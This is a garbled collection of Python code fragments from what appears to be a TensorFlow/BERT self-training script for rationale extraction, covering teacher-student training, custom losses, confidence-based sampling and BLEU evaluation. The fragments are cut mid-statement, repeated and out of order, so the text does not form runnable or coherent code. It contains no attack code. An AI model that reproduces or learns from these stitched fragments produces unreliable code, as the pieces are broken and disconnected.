> 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg'", "'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in", "score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc,", "0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None},", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r", "attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1", "Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X", "from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256)", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0]", "X_conf[:,0] = 
np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the", "y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus,", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights", "label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append('", "y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale", "acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1)", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel,", "'_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "from collections import defaultdict from sklearn.utils import shuffle from transformers import * import", "model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif", "= np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = 
{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if", "1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r}", "elif type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0],", "score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [],", "random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in", "[y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in", "in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample", "= 0. max_best_acc = 0. val_loss = 0. 
if 'mtl' in type_: logger.info(\"y_test:", "logger.info (\"Evaluating confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size,", "type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc =", "batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1)", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def", "SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger =", "0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0", "= np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all the unlabeled", "pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction", "best_base_model = model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in", "axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score:", "0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length))", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)),", "y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev", "valid_split if valid_split > 0: train_size = int((1. 
- valid_split)*len(X[\"input_ids\"])) if '_neg' in", "{} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred)))", "logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score", "of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size]", "101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale", "in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\":", "sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg'", "0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg},", "'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1)", "\"attention_mask\": X[\"attention_mask\"][train_size:], 
\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "#_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if", "teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None,", "axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0],", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = []", "and dev with valid_split if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"]))", "X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token", "0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. 
max_best_acc = 0.", "unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance':", "np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student =", "custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if", "word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p", "'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices],", "(token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if", "0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": 
X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices],", "y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs", "len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred =", "verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_:", "cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss", "loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights", "if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\":", "1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append('", "json import nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend", "X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig,", "''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc =", "max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, 
sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme))", "in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:]", "sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_:", "X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat =", "tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs,", "if y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1", "\".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp =", "#model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl'", "score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of", "unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of", "axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc =", "0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0,", "if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc,", "model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ 
== 'mtl':", "with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_:", "= [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0,", "in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev,", "y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5,", "[] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected:", "rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if", "0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\":", "{\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices],", "of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales", "np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], 
np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0.", "type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] =", "tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i]", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if", "replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint'", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc:", "model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {}", "attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r,", "{}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3]", "X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices],", "log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = 
np.where(log_probs>0, log_probs,", "'_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg],", "type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]},", "= model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_:", "temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001)", "cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss =", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal' in", "len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file)", "strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights", "y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred", "= y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni'", "from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, 
total_epoch_count=90): def", "y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "= 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student", "np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i,", "#logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test)", "type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint'", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg']", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights", "for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model", "set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances", "#compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence", "X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], 
X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:,", "np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_:", "= np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in", "cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return", "= os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE)", "np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose", "= y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1],", "0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = 
model model_student.load_weights(model_file_best) if", "i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in", "indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices],", "np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc,", "temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'),", "unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5,", "r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0]))", "np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] <", "y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if", "logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0,", "== 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task", "test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test,", 
"y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0],", "if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled", "{\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r", "score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)):", "= np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance", "val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc:", "y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = 